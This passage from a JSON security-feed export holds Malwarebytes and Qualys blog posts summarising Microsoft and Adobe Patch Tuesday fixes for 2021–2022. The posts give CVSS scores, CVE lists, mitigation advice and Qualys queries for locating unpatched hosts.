off, you will need to create a Security Update Guide profile by clicking \u201cSign in\u201d at the top right corner of the [Security Update Guide](<https://msrc.microsoft.com/update-guide>). You can use any email and password here. If this is your first time signing in, a validation email will be sent with steps to verify that you have entered a valid email address.\n\n## Other security updates\n\nDon't forget to look at other security updates that you may need. We have seen updates from:\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [Android](<https://source.android.com/security/bulletin/2022-01-01>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Intel](<https://www.intel.com/content/www/us/en/security-center/default.html>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=596902035>)\n * [VMWare](<https://www.vmware.com/security/advisories/VMSA-2022-0001.html>)\n\n## Update January 18\n\nMicrosoft has released emergency out-of-band (OOB) updates to address multiple issues caused by Windows Updates issued during the January 2021 Patch Tuesday. For those that were experiencing problems or holding off on the updates, this update addresses issues related to VPN connectivity, Windows Server Domain Controllers restarting, Virtual Machines start failures, and ReFS-formatted removable media failing to mount.\n\nStay safe, everyone!\n\nThe post [[updated] You can update now: Microsoft patches 97 bugs including 6 zero-days and a wormable one](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/01/update-now-microsoft-patches-97-bugs-including-6-zero-days-and-a-wormable-one/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-12T17:02:25", "type": "malwarebytes", "title": "[updated] You can update now: Microsoft patches 97 bugs including 6 zero-days and a wormable one", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21836", "CVE-2022-21839", "CVE-2022-21874", "CVE-2022-21907", "CVE-2022-21919"], "modified": "2022-01-12T17:02:25", "id": "MALWAREBYTES:DACEDE0F6B5888B6C6E281338C4B9980", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/01/update-now-microsoft-patches-97-bugs-including-6-zero-days-and-a-wormable-one/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-19T21:28:45", "description": "It\u2019s that time of the month again. Time to check what needs to be updated and prioritize where necessary. The Microsoft updates include at least two zero-day vulnerabilities that deserve your attention.\n\n## Microsoft\n\nMicrosoft has released security updates and non-security updates for client and server versions of its Windows operating system and other company products, including Microsoft Office and Edge.\n\nFor those that have extended support for Windows 7, there are four critical remote code execution (RCE) vulnerabilities to worry about:\n\n * [CVE-2022-24500](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24500>) [CVSS](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) 8.8 out of 10, a Windows SMB Remote Code Execution vulnerability\n * [CVE-2022-24541](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24541>) CVSS 8.8, a Windows Server Service Remote Code Execution vulnerability\n * [CVE-2022-26809](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26809>) CVSS 9.8, a Remote Procedure Call Runtime Remote Code Execution vulnerability\n * [CVE-2022-26919](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26919>) CVSS 8.1, a Windows LDAP Remote Code Execution vulnerability\n\nCVE-2022-26809 does have a CVSS of 9.8 for good reason. It affects almost every Windows OS and Microsoft has it listed as more likely to be exploited. To exploit this vulnerability, an attacker would need to send a specially crafted RPC call to an RPC host. This could result in remote code execution on the server side with the same permissions as the RPC service. TCP port 445 is used to initiate a connection with the affected component. And some quick Shodan scans showed that millions of systems have that port open.\n\n> We've learned nothing.  \nCVE-2022-26809 is going to ruin some weekends.<https://t.co/mD6irwPdUs>[#CyberSecurity](<https://twitter.com/hashtag/CyberSecurity?src=hash&ref_src=twsrc%5Etfw>) [pic.twitter.com/szPhauAIrv](<https://t.co/szPhauAIrv>)\n> \n> -- Jon Gorenflo  (@flakpaket) [April 12, 2022](<https://twitter.com/flakpaket/status/1514029843335237636?ref_src=twsrc%5Etfw>)\n\nMicrosoft classifies a vulnerability as a zero-day if it is publicly disclosed or actively exploited with no official fix available. The zero-day vulnerabilities fixed in this update cycle are:\n\n * [CVE-2022-26904](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26904>) CVSS 7.0, a Windows User Profile Service Elevation of Privilege (EoP) vulnerability. This one is marked with a high attack complexity, because successful exploitation of this vulnerability requires an attacker to win a race condition. But the vulnerability is public knowledge and there is an existing Metasploit module for it. Metasploit is an open-source penetrating framework used by security engineers as a penetration testing system and a development platform that allows to create security tools and exploits.\n * [CVE-2022-24521](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24521>) CVSS 7.8, a Windows Common Log File System Driver Elevation of Privilege vulnerability. This vulnerability has been used in the wild. Microsoft says that attack complexity is low. The vulnerability was reported to Microsoft by the National Security Agency (NSA) and Crowdstrike.\n\nOther notable CVEs:\n\n * [CVE-2](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24491>)[0](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24491>)[22-24491](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24491>) CVSS 9.8, a Windows Network File System Remote Code Execution vulnerability. This vulnerability is only exploitable for systems that have the [NFS role](<https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview>) enabled. An attacker could send a specially crafted NFS protocol network message to a vulnerable Windows machine, which could enable remote code execution.\n * [CVE-2022-24997](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24997>) CVSS 9.8, another Windows Network File System Remote Code Execution vulnerability. This vulnerability is only exploitable for systems that have the NFS role enabled. An attacker could send a specially crafted NFS protocol network message to a vulnerable Windows machine, which could enable remote code execution.\n\nOn these systems with the NFS role enabled, a remote attacker could execute their code with high privileges and without user interaction. This worries experts as these may turn out to be wormable bugs between NFS servers. For a temporary solution, more information on installing or uninstalling Roles or Role Services is available [here](<https://docs.microsoft.com/en-us/windows-server/administration/server-manager/install-or-uninstall-roles-role-services-or-features#install-roles-role-services-and-features-by-using-the-add-roles-and-features-wizard>).\n\nA vulnerability is considered to be wormable if an attack can be launched that requires no human interaction to spread. The impact can be considerable if the number of vulnerable machine is high enough. In these cases web application firewalls (WAFs) would help to mitigate the risk.\n\nIn related news, Microsoft [announced](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/get-current-and-stay-current-with-windows-autopatch/ba-p/3271839>) the release of Windows Autopatch, which is set for July 2022. This will hopefully lessen some of the burdens that come with [patch management](<https://www.malwarebytes.com/business/vulnerability-patch-management>).\n\n## Edge and Chrome\n\nThe Microsoft updates included 26 Microsoft Edge vulnerabilities and Google released a stable channel update for Windows, Mac, and Linux that includes 11 security fixes. Eight out of those 11 were rated with a High severity, none were marked as Critical.\n\n## Other updates\n\nWhile you're at it, we also saw updates from vendors like:\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [VMWare](<https://core.vmware.com/vmsa-2022-0011-questions-answers-faq#section1>)\n\nStay safe, everyone!\n\nThe post [April's Patch Tuesday update includes fixes for two zero-day vulnerabilities](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/aprils-patch-tuesday-update-includes-fixes-for-two-zero-day-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T13:57:39", "type": "malwarebytes", "title": "April\u2019s Patch Tuesday update includes fixes for two zero-day vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24491", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24541", "CVE-2022-24997", "CVE-2022-26809", "CVE-2022-26904", "CVE-2022-26919"], "modified": "2022-04-13T13:57:39", "id": "MALWAREBYTES:EF0C1E45728B8347B58DBE1D76A5F156", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/aprils-patch-tuesday-update-includes-fixes-for-two-zero-day-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-04-19T21:28:45", "description": "## **Microsoft Patch Tuesday Summary**\n\nMicrosoft has fixed 145 vulnerabilities, including 17 Microsoft Edge vulnerabilities, in the April 2022 update, with ten (10) classified as **_Critical_** as they allow Remote Code Execution (RCE). This month\u2019s Patch Tuesday release includes fixes for two (2) zero-day vulnerabilities as well, one (1) known to be actively exploited ([CVE-2022-24521](<http://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24521>)) and the other to be publicly exposed ([CVE-2022-26904](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26904>)).\n\nMicrosoft has fixed several problems in their software, including Denial of Service, Elevation of Privilege, Information Disclosure, Remote Code Execution, and Spoofing vulnerabilities.\n\n## Notable Microsoft Vulnerabilities Patched\n\nThis month\u2019s [advisory](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Apr>) covers multiple Microsoft products, including, but not limited to, Azure, Browser (Edge \u2013 Chromium), Developer Tools, Extended Security Update (ESU), Microsoft Dynamics, Microsoft Office, SQL Server, System Center, and Windows.\n\n### **[CVE-2022-23259](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23259>) | Microsoft Dynamics 365 (on-premises) Remote Code Execution (RCE) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nAn authenticated user could run a specially crafted trusted solution package to execute arbitrary SQL commands. From there the attacker could escalate and execute commands as db_owner within their Dynamics 356 database.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely._**\n\n* * *\n\n### **[CVE-2022-24491](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24491>) and [CVE-2022-24497](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24497>) | Windows Network File System Remote Code Execution (RCE) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nAn attacker could send a specially crafted NFS protocol network message to a vulnerable Windows machine, which could enable remote code execution. NOTE: This vulnerability is only exploitable for systems that have the [NFS](<https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview>) role enabled.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely._**\n\n* * *\n\n### **[CVE-2022-24500](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24500>) | Windows SMB Remote Code Execution (RCE) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nThis vulnerability requires that a user with an affected version of Windows access a malicious server. An attacker would have to host a specially crafted server share or website. An attacker would have no way to force users to visit this specially crafted server share or website, but would have to convince them to visit the server share or website, typically by way of an enticement in an email or chat message. For vulnerability to be exploited, a user would need to access a malicious SMB server to retrieve some data as part of an OS API call. Microsoft offers mitigations for this vulnerability; Block TCP port 445 at the enterprise perimeter firewall, and follow [Microsoft guidelines to secure SMB traffic](<https://docs.microsoft.com/windows-server/storage/file-server/smb-secure-traffic>).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely._**\n\n* * *\n\n### **[CVE-2022-24541](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24541>) | Windows Server Service Remote Code Execution (RCE) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nThis vulnerability requires that a user with an affected version of Windows access a malicious server. An attacker would have to host a specially crafted server share or website. An attacker would have no way to force users to visit this specially crafted server share or website, but would have to convince them to visit the server share or website, typically by way of an enticement in an email or chat message. Microsoft offers mitigations for this vulnerability; Block TCP port 445 at the enterprise perimeter firewall, and follow [Microsoft guidelines to secure SMB traffic](<https://docs.microsoft.com/windows-server/storage/file-server/smb-secure-traffic>).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely._**\n\n* * *\n\n### **[CVE-2022-26809](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809>) | Remote Procedure Call (RPC) Runtime Remote Code Execution (RCE) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nTo exploit this vulnerability, an attacker would need to send a specially crafted Remote Procedure Call (RPC) to an RPC host. This could result in remote code execution (RCE) on the server-side with the same permissions as the RPC service. Microsoft offers mitigations for this vulnerability; Block TCP port 445 at the enterprise perimeter firewall, and follow [Microsoft guidelines to secure SMB traffic](<https://docs.microsoft.com/windows-server/storage/file-server/smb-secure-traffic>).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely._**\n\n## Notable Adobe Vulnerabilities Patched\n\nAdobe released four (4) [advisories ](<https://helpx.adobe.com/security/security-bulletin.html>)with updates to fix 78 vulnerabilities affecting Acrobat, Acrobat Reader, Adobe After Effects, Adobe Commerce, Magento Open Source, and Photoshop. Of these 78 vulnerabilities, 51 are rated as **_Critical_**.\n\n### **[APSB22-13](<https://helpx.adobe.com/security/products/magento/apsb22-13.html>) | Security update available for Adobe Commerce**\n\nThis update resolves one (1) **_Critical_** vulnerability. \n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe Commerce and Magento Open Source. This update resolves a critical Arbitrary code execution vulnerability. Successful exploitation could lead to arbitrary code execution. \n\n* * *\n\n### **[APSB22-16](<https://helpx.adobe.com/security/products/acrobat/apsb22-16.html>) | Security update available for Adobe Acrobat and Reader**\n\nThis update resolves multiple **_Critical, Important, _**_and** Moderate**_ vulnerabilities and addresses 62 CVEs. \n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 2_\n\nAdobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. Successful exploitation could lead to arbitrary code execution, memory leak, security feature bypass, and privilege escalation. \n\n* * *\n\n### **[APSB22-19](<https://helpx.adobe.com/security/products/after_effects/apsb22-19.html>)** | **Security Updates Available for Adobe After Effects**\n\nThis update addresses two (2) **_Critical _**security vulnerabilities. \n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Adobe After Effects for Windows and macOS. Successful exploitation could lead to arbitrary code execution in the context of the current user. \n\n* * *\n\n### **[APSB22-20](<https://helpx.adobe.com/security/products/photoshop/apsb22-20.html>) |** **Security update available for Adobe Photoshop**\n\nThis update addresses 13 **_Critical_** security vulnerabilities. \n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Photoshop for Windows and macOS. Successful exploitation could lead to arbitrary code execution.\n\n## About Qualys Patch Tuesday\n\nQualys Patch Tuesday QIDs are published as [Security Alerts](<https://www.qualys.com/research/security-alerts/>) typically late in the evening on the day of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>) followed later by the publication of the monthly queries for the [Unified Dashboard: 2022 Patch Tuesday (QID Based) Dashboard](<https://success.qualys.com/discussions/s/article/000006821>) by Noon on Wednesday.\n\n## Discover and Prioritize Vulnerabilities in [Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) \n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its Knowledge Base (KB). \n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n\n`vulnerabilities.vulnerability:( qid:`91879` OR qid:`91880` OR qid:`91881` OR qid:`91882` OR qid:`91883` OR qid:`91884` OR qid:`91885` OR qid:`91886` OR qid:`91889` OR qid:`91890` OR qid:`110404` OR qid:`110405` OR qid:`110406` OR qid:`376535` )`\n\n\n\n* * *\n\n## Rapid Response with [Patch Management (PM)](<https://www.qualys.com/apps/patch-management/>)\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches pertaining to this Patch Tuesday:\n\n`( qid:`91879` OR qid:`91880` OR qid:`91881` OR qid:`91882` OR qid:`91883` OR qid:`91884` OR qid:`91885` OR qid:`91886` OR qid:`91889` OR qid:`91890` OR qid:`110404` OR qid:`110405` OR qid:`110406` OR qid:`376535` )`\n\n\n\n* * *\n\n## Monthly Webinar Series: This Month in Vulnerabilities & Patches \n\n\n\nThe Qualys Research team hosts a monthly webinar series to help our existing customers leverage the seamless integration between Qualys[ Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and [Patch Management (PM)](<https://www.qualys.com/apps/patch-management/>). Combining these two solutions can reduce the median time to remediate critical vulnerabilities. \n\nDuring the webcast, we will discuss this month\u2019s high-impact vulnerabilities, including those that are part of this month's Patch Tuesday alert. We will walk you through the necessary steps to address the key vulnerabilities using Qualys VMDR and Patch Management. \n\n* * *\n\n### ******Join the webinar******\n\n## ******This Month in Vulnerabilities & Patches******\n\n[Register Now](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>)\n\n## Contributor\n\n[Bharat Jogi](<https://blog.qualys.com/author/bharat_jogi>), **Director, Vulnerability and Threat Research, Qualys**", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T20:07:30", "type": "qualysblog", "title": "April 2022 Patch Tuesday: Microsoft Releases 145 Vulnerabilities with 10 Critical; Adobe Releases 4 Advisories, 78 Vulnerabilities with 51 Critical.", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-23259", "CVE-2022-24491", "CVE-2022-24497", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24541", "CVE-2022-26809", "CVE-2022-26904"], "modified": "2022-04-12T20:07:30", "id": "QUALYSBLOG:C3DA3EB171A3FE51549E5B118BC0C7BB", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-21T10:10:11", "description": "### Microsoft Patch Tuesday \u2013 August 2021\n\nMicrosoft patched 51 vulnerabilities in their August 2021 Patch Tuesday release, and 7 of them are rated as critical severity. Three 0-day vulnerability patches were included in the release.\n\n#### Critical Microsoft Vulnerabilities Patched\n\n[CVE-2021-36942](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942>) - Windows LSA Spoofing Vulnerability\n\nAn unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller to authenticate against another server using NTLM. A malicious user can use this attack to take complete control over windows domain Per Microsoft, this vulnerability affects all servers, but domain controllers should be prioritized in terms of applying security updates.\n\n[CVE-2021-34481](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34481>) \u2013 Windows Print Spooler Remote Code Execution Vulnerability\n\nA remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. This Patch Tuesday Microsoft released security updates to address this vulnerability and should be prioritized.\n\n#### Three 0-Day Vulnerabilities Patched\n\n * [CVE-2021-36936](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36936>) - Windows Print Spooler Remote Code Execution Vulnerability\n * [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942>) - Windows LSA Spoofing Vulnerability\n * [CVE-2021-36948](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36948>) - Windows Update Medic Service Elevation of Privilege Vulnerability - This has been actively exploited, per Microsoft.\n\n#### Qualys QIDs Providing Coverage\n\n**QID**| **Title**| **Severity**| **CVE ID** \n---|---|---|--- \n110388| Microsoft SharePoint Enterprise Server Multiple Vulnerabilities August 2021| Medium| [_CVE-2021-36940_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36940>) \n110389| Microsoft Office and Microsoft Office Services and Web Apps Security Update August 2021 | High| [_CVE-2021-34478_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34478>), [_CVE-2021-36941_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36941>) \n375798| Microsoft Azure CycleCloud Elevation of Privilege Vulnerability August 2021 | Medium| [_CVE-2021-33762_](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33762>), [_CVE-2021-36943_](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36943>), [_KB3142345_](<https://www.microsoft.com/en-us/download/details.aspx?id=103313>) \n91801| Microsoft Dynamics Business Central Cross-Site (XSS) Scripting Vulnerability August 2021 | Medium | [_CVE-2021-36946_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36946>) \n91802| Microsoft Windows Security Update for August 2021 \n \n | High| CVE-2021-26424, [_CVE-2021-26425_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26425>), [_CVE-2021-26426_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26426>), [_CVE-2021-26431_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26431>), [_CVE-2021-26432_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26432>), [_CVE-2021-26433_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26433>), [_CVE-2021-34480_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34480>), [_CVE-2021-34483_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34483>), [_CVE-2021-34484_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34484>), [_CVE-2021-34486_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34486>), [_CVE-2021-34487_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34487>), [_CVE-2021-34530_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34530>), [_CVE-2021-34533_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34533>), [_CVE-2021-34534_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34534>), [_CVE-2021-34535_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34535>), [_CVE-2021-34536_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34536>), [_CVE-2021-34537_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34537>), [_CVE-2021-36926_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36926>), [_CVE-2021-36927_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36927>), [_CVE-2021-36932_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36932>), [_CVE-2021-36933_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36933>), [_CVE-2021-36936_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36936>), [_CVE-2021-36937_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36937>), [_CVE-2021-36938_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36938>), [_CVE-2021-36947_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36947>), [_CVE-2021-36948_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36948>) \n91803| Microsoft Windows Local Security Authority (LSA) Spoofing Vulnerability August 2021 | High| [_CVE-2021-36942_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36942>) \n91804| Microsoft Windows Defender Elevation of Privilege Vulnerability August 2021 | Medium| [_CVE-2021-34471_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34471>) \n91805| Microsoft Windows 10 Update Assistant Elevation of Privilege Vulnerability August 2021 | Medium | [_CVE-2021-36945_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36945>) \n91806| Microsoft Azure Active Directory Connect Authentication Bypass Vulnerability August 2021 | Medium| [_CVE-2021-36949_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36949>) \n91774| Microsoft .NET Core and ASP.NET Core Security Update for August 2021 | High| [_CVE-2021-26423_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26423>), [_CVE-2021-34485_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34485>), [_CVE-2021-34532_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34532>) \n91809| Microsoft Visual Studio Security Update for August 2021 | Medium| [_CVE-2021-26423_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26423>), [_CVE-2021-34485_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34485>), [_CVE-2021-34532_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34532>) \n \n### Adobe Patch Tuesday \u2013 August 2021\n\nAdobe addressed 29 CVEs this Patch Tuesday impacting Adobe Connect and Magento product. The patches for Magento are labeled as [Priority 2](<https://helpx.adobe.com/security/severity-ratings.html>), while the remaining patches are set to [Priority 3](<https://helpx.adobe.com/security/severity-ratings.html>).\n\n**Adobe Security Bulletin**| **QID**| **Severity**| **CVE ID** \n---|---|---|--- \nAdobe Connect Multiple Vulnerabilities (APSB21-66) | 730152| Medium| [CVE-2021-36061](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36061>), [CVE-2021-36062](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36062>), [CVE-2021-36063](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36063>) \n \n### Discover Patch Tuesday Vulnerabilities in VMDR\n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its Knowledge Base (KB).\n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n\n`vulnerabilities.vulnerability:(qid:`91774` OR qid:`91801` OR qid:`91802` OR qid:`91803` OR qid:`91804` OR qid:`91805` OR qid:`91806` OR qid:`91809` OR qid:`375798` OR qid:`110389` OR qid:`110388` OR qid:`730152`)`\n\n\n\n### Respond by Patching\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches pertaining to this Patch Tuesday.\n\n`(qid:`91774` OR qid:`91801` OR qid:`91802` OR qid:`91803` OR qid:`91804` OR qid:`91805` OR qid:`91806` OR qid:`91809` OR qid:`375798` OR 